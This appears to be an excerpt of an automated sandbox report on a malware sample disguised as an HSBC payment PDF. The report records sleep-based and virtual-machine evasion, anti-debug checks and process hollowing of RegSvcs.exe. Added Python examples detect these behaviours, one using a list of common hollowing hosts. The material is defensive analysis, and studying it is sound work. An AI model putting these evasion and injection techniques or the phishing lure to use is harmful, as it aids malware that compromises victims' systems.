                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652 | Thread sleep count: 4232 > 30
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652 | Thread sleep time: -42320000s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exe | Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599212
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598894
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598231
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597681
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597317
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596321
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596131
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595943
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595764
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595309
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595202
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594533
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594176
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593602Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593247Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593040Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592923Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592565Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: RSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000ce
Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000530000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Deviceb
Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00|
Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #TSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2172372849.0000000000535000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverT
Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000002.3350961380.0000000000538000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2169195097.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2169578065.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000526000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 000VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceP
Source: RegSvcs.exe, 00000011.00000002.3350551229.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, snmptrap.exe, 00000012.00000002.3341028754.00000000005A3000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000015.00000002.3343746783.000000000052C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000526000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: STNECVMWar VMware SATA CD00J
Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter<wS
Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: AppVClient.exe, 00000007.00000002.2110084231.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109436235.0000000000497000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109339753.0000000000490000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineg
Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 4NECVMWar VMware SATA CD00
Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Spectrum.exe, 00000013.00000003.2172372849.0000000000535000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus DeviceV
Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000002.3350961380.0000000000538000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructb$
Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000530000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JVMware Virtual disk SCSI Disk Device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_068E4560 LdrInitializeThunk,LdrInitializeThunk
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_007008F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_006C1130 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_007034CD mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_007008F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_0070420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard
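The delay and memory-string evidence above is easier to reason about once it is parsed than when it is read line by line. The following Python is an added example written for this page, not part of the Joe Sandbox report or its tooling: it pulls the "Thread delayed" values and the virtualization-related "Binary or memory string" hits out of evidence lines in the report's own text format, checks whether the delays form a countdown, and lists which VM vendor markers each process holds. The sample lines embedded in the block are copied from this report (one source list is shortened); the marker list and the regular expressions are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Evidence lines copied from this report (the third memory-string line is shortened to
# two of its three sources). The parsers accept both the raw extraction, where the
# source and the description run together ("RegSvcs.exeThread delayed") and the page's
# "Jump to behavior" link text trails the line, and a cleaned "Source | description" form.
SAMPLE_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597317Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior",
    r"Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000",
    r"Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2172372849.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverT",
    r"Source: RegSvcs.exe, 00000011.00000002.3350551229.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, snmptrap.exe, 00000012.00000002.3341028754.00000000005A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r"Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_007008F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_007008F1",
]

DELAY_RE = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)\s*\|?\s*Thread delayed: delay time:\s*(?P<ms>\d+)")
MEMSTR_RE = re.compile(
    r"Source:\s*(?P<src>[^,|]+?\.exe).*?Binary or memory string:\s*(?P<s>.+?)(?:Jump to behavior)?$")
# Vendor markers that point at a hypervisor (example's own list, matched case-insensitively).
VM_MARKERS = ("VMware", "NECVMWar", "VMCI", "Hyper-V", "VirtualBox", "VBOX", "QEMU")


@dataclass
class SleepSummary:
    source: str
    calls: int
    first_ms: int
    last_ms: int
    countdown: bool     # every delay is shorter than the one before it
    max_step_ms: int    # largest decrease between consecutive calls
    elapsed_ms: int     # first_ms - last_ms: wall clock spent across the calls if this is a countdown

    @property
    def intended_stall_s(self) -> float:
        # A countdown re-requests the time left to one deadline, so the stall the code
        # is aiming for is the first request, not the sum of all requests.
        return self.first_ms / 1000.0


def summarize_sleeps(lines: List[str]) -> List[SleepSummary]:
    per_source: Dict[str, List[int]] = {}
    for line in lines:
        m = DELAY_RE.search(line)
        if m:
            per_source.setdefault(m["src"], []).append(int(m["ms"]))
    summaries = []
    for src, ms in per_source.items():
        steps = [a - b for a, b in zip(ms, ms[1:])]
        summaries.append(SleepSummary(
            source=src, calls=len(ms), first_ms=ms[0], last_ms=ms[-1],
            countdown=bool(steps) and all(s > 0 for s in steps),
            max_step_ms=max(steps) if steps else 0,
            elapsed_ms=ms[0] - ms[-1]))
    return summaries


def vm_artifacts(lines: List[str]) -> Dict[str, List[str]]:
    """Map each source process to the sorted VM markers found in its memory strings."""
    hits: Dict[str, set] = {}
    for line in lines:
        m = MEMSTR_RE.search(line)
        if not m:
            continue
        found = [k for k in VM_MARKERS if k.lower() in m["s"].lower()]
        if found:
            hits.setdefault(m["src"], set()).update(found)
    return {src: sorted(v) for src, v in hits.items()}


def evasion_report(lines: List[str]) -> List[str]:
    out = []
    for s in summarize_sleeps(lines):
        out.append(f"{s.source}: {s.calls} delayed calls, first {s.first_ms} ms, last {s.last_ms} ms, "
                   f"{'countdown' if s.countdown else 'irregular'}, "
                   f"intended stall ~{s.intended_stall_s:.0f} s")
    for src, marks in vm_artifacts(lines).items():
        out.append(f"{src}: virtualization markers in memory: {', '.join(marks)}")
    return out


if __name__ == "__main__":
    print("\n".join(evasion_report(SAMPLE_LINES)))
```

Run as-is it prints one line per finding. The 39 RegSvcs.exe delays in the report fall from 597563 ms to 592565 ms in steps of roughly 100 to 350 ms, which is what a loop that keeps re-requesting the time left to a single deadline looks like when the sandbox shortens each sleep; the stall the payload is aiming for is therefore about ten minutes, and an analysis run cut off earlier misses everything RegSvcs.exe does afterwards. The VM strings, by contrast, sit in Windows services that the infector rewrote (Spectrum.exe, snmptrap.exe, ssh-agent.exe) and may simply be the guest's own device names held in those processes, so they are weaker evidence of an active check than the timing is.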

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 110F008
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTD4C9.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTD4CA.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\perfhost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\Spectrum.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\TieringEngineService.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 15_2_006E7960 GetVolumeInformationW,GetWindowsDirectoryW,CreateThread,CreateThread,GetLastError,GetWindowsDirectoryW,CreateThread,GetUserNameW,GetLastError,GetComputerNameW,CreateThread,GetVolumeInformationW,CreateThread,GetUserNameW,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
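The three lines for the sample and RegSvcs.exe (a process created with the sample's own path as its command line, memory written into that child, and a section mapped into it with execute, read and write protection) are the classic shape of process hollowing. The following Python is an added example for this page, not code from the report: it correlates such events per source/target pair and reports the pair once enough of the chain is present. The event dictionaries and field names are this example's own model of the report lines, and the list of .NET utilities commonly used as hollowing hosts is an assumption from general practice, not something this report states.

```python
import ntpath
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# The three report lines, modelled as events (field names are this example's own).
REPORT_EVENTS = [
    {"kind": "process_created", "source": SAMPLE, "target": REGSVCS, "cmdline": f'"{SAMPLE}"'},
    {"kind": "memory_written", "source": SAMPLE, "target": REGSVCS, "base": "110F008"},
    {"kind": "section_loaded", "source": SAMPLE, "target": REGSVCS,
     "protection": "execute and read and write"},
]
# Constructed benign control: an ordinary child launch with no memory tampering.
BENIGN_EVENTS = [
    {"kind": "process_created", "source": r"C:\Windows\explorer.exe",
     "target": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
]

# .NET utilities that loaders routinely start suspended and hollow out. Assumption drawn
# from general practice, not a list this report provides.
HOLLOWING_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
                   "applaunch.exe", "aspnet_compiler.exe"}


def image_of_cmdline(cmdline: str) -> str:
    """Return the image named by a Windows command line, honouring a quoted path."""
    c = cmdline.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[1:end] if end > 0 else c[1:]
    return c.split()[0] if c else ""


@dataclass
class InjectionFinding:
    source: str
    target: str
    reasons: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def detect_hollowing(events: List[dict], min_score: int = 2) -> List[InjectionFinding]:
    """Correlate cross-process events per (source, target) pair and keep the pairs that
    show at least min_score independent hollowing indicators."""
    by_pair: Dict[Tuple[str, str], InjectionFinding] = {}

    def finding(src: str, tgt: str) -> InjectionFinding:
        return by_pair.setdefault((src, tgt), InjectionFinding(src, tgt))

    for e in events:
        src, tgt = e["source"], e["target"]
        if ntpath.normcase(src) == ntpath.normcase(tgt):
            continue  # a process working on its own memory is not injection
        tgt_name = ntpath.basename(tgt).lower()
        if e["kind"] == "process_created":
            claimed = ntpath.basename(image_of_cmdline(e.get("cmdline", ""))).lower()
            if claimed and claimed != tgt_name:
                # Hollowing tell: the child runs image X but was handed Y's command line.
                finding(src, tgt).reasons.append(
                    f"child image {tgt_name} created with a command line naming {claimed}")
            if tgt_name in HOLLOWING_HOSTS:
                finding(src, tgt).reasons.append(
                    f"{tgt_name} is a .NET utility commonly used as a hollowing host")
        elif e["kind"] == "memory_written":
            finding(src, tgt).reasons.append(
                f"cross-process memory write at base {e.get('base', '?')}")
        elif e["kind"] == "section_loaded":
            prot = e.get("protection", "").lower()
            if "execute" in prot and "write" in prot:
                finding(src, tgt).reasons.append(
                    f"section mapped into target with protection '{e['protection']}'")
    return [f for f in by_pair.values() if f.score >= min_score]


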